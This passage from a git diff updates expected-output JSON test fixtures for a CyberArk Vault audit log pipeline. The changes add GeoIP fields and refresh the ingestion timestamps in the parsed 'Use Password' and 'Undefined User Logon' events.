"geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -873,7 +963,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374533800Z", + "ingested": "2021-12-14T14:42:18.814512278Z", "original": "\u003c5\u003e1 2021-03-15T10:31:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:54\",\"IsoTimestamp\":\"2021-03-15T10:31:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", 
@@ -898,17 +988,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -979,7 +1087,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374538300Z", + "ingested": "2021-12-14T14:42:18.814512667Z", "original": "\u003c5\u003e1 2021-03-15T14:08:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" 
Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:26\",\"IsoTimestamp\":\"2021-03-15T14:08:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", @@ -1004,17 +1112,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1085,7 +1211,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374543300Z", + "ingested": "2021-12-14T14:42:18.814513065Z", "original": "\u003c5\u003e1 2021-03-16T10:04:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" 
Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:49\",\"IsoTimestamp\":\"2021-03-16T10:04:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json index c90ee6bc199..bb268d66161 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json 
@@ -58,7 +58,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859779600Z", + "ingested": "2021-12-14T14:42:20.541744956Z", "original": "\u003c7\u003e1 2021-03-08T18:31:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:31:52\",\"IsoTimestamp\":\"2021-03-08T18:31:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansr\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", @@ -133,7 +133,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859787800Z", + "ingested": "2021-12-14T14:42:20.541747714Z", "original": "\u003c7\u003e1 2021-03-08T18:32:03Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:03\",\"IsoTimestamp\":\"2021-03-08T18:32:03Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansra\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", 
@@ -157,6 +157,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -200,7 +209,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859793400Z", + "ingested": "2021-12-14T14:42:20.541748227Z", "original": "\u003c7\u003e1 2021-03-11T16:43:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:43:26\",\"IsoTimestamp\":\"2021-03-11T16:43:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"PSMAdmin\",\"Action\":\"Undefined User 
Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"\"}}}", "code": "309", "kind": "event", @@ -224,6 +233,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -276,7 +294,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859798700Z", + "ingested": "2021-12-14T14:42:20.541753361Z", "original": "\u003c7\u003e1 2021-03-11T17:46:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:28\",\"IsoTimestamp\":\"2021-03-11T17:46:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adrian\",\"Action\":\"Undefined User 
Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "309", "kind": "event", @@ -300,10 +318,28 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -352,7 +388,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859804100Z", + "ingested": "2021-12-14T14:42:20.541753835Z", "original": "\u003c7\u003e1 2021-03-14T13:28:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:28:00\",\"IsoTimestamp\":\"2021-03-14T13:28:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"testark\",\"Action\":\"Undefined User 
Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "309", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json index bac89b31297..12d71010dbb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json 
